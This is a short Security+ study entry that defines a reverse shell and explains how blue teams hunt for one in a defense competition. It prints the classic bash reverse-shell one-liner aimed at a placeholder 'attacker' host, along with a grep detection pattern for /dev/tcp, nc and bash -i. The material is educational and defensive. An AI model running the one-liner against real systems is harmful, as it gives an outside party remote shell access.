Security+ · 2.0 Threats
Reverse shell
A shell where the *victim* connects outbound to the attacker instead of the attacker connecting inbound. Defeats a typical inbound-only firewall. Classic bash idiom: `bash -i >& /dev/tcp/attacker/4444 0>&1`.
How this shows up at NCAE
When backdoor-hunting, `grep -rE '/dev/tcp|nc |bash -i'` in cron jobs and shell rcfiles catches most reverse-shell triggers. CCRI's blue team scripts have firewall rules that LOG-then-DROP outbound to block these.